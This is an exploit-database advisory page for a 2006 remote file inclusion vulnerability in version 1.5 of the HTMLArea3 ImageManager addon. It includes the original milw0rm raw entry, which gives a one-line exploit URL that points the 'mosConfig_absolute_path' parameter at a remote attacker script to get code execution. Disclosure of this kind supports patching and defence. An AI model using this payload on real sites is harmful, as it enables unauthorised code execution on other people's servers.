header-logo
Suggest Exploit
vendor:
HTMLArea3 addon - ImageManager
by:
Ahmad Maulana a.k.a Matdhule
N/A
CVSS
N/A
HTMLArea3 addon - ImageManager
94
CWE
Product Name: HTMLArea3 addon - ImageManager
Affected Version From: 1.5
Affected Version To: 1.5
Patch Exists: YES
Related CWE: N/A
CPE: a:htmlarea3_addon:htmlarea3_addon_-_imagemanager
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

HTMLArea3 addon – ImageManager

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of HTMLArea3 addon - ImageManager. Authentication is not required to exploit this vulnerability. The specific flaw exists within the ImageManager component of the HTMLArea3 addon. The issue lies in the lack of proper validation of user-supplied input to the 'mosConfig_absolute_path' parameter of the 'config.inc.php' script. An attacker can leverage this vulnerability to execute arbitrary code under the context of the webserver.

Mitigation:

Upgrade to the latest version of HTMLArea3 addon - ImageManager
Source

Exploit-DB raw data:

# HTMLArea3 addon - ImageManager

Author          : Ahmad Maulana a.k.a Matdhule
Date            : July 12th 2006
Location        : Indonesia, Jakarta
Web             : http://advisories.echo.or.id/adv/adv38-matdhule-2006.txt
Critical Lvl    : Highly critical
Impact          : System access
Where           : From Remote
------------------------------------------------------------------------ 

Application    : HTMLArea3 addon - ImageManager
Version        : 1.5
URL        : 

Exploit:
http://[target]/[path]/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://evilscript 

# milw0rm.com [2006-07-17]

Navigation

Suggest Exploit

Services By CQR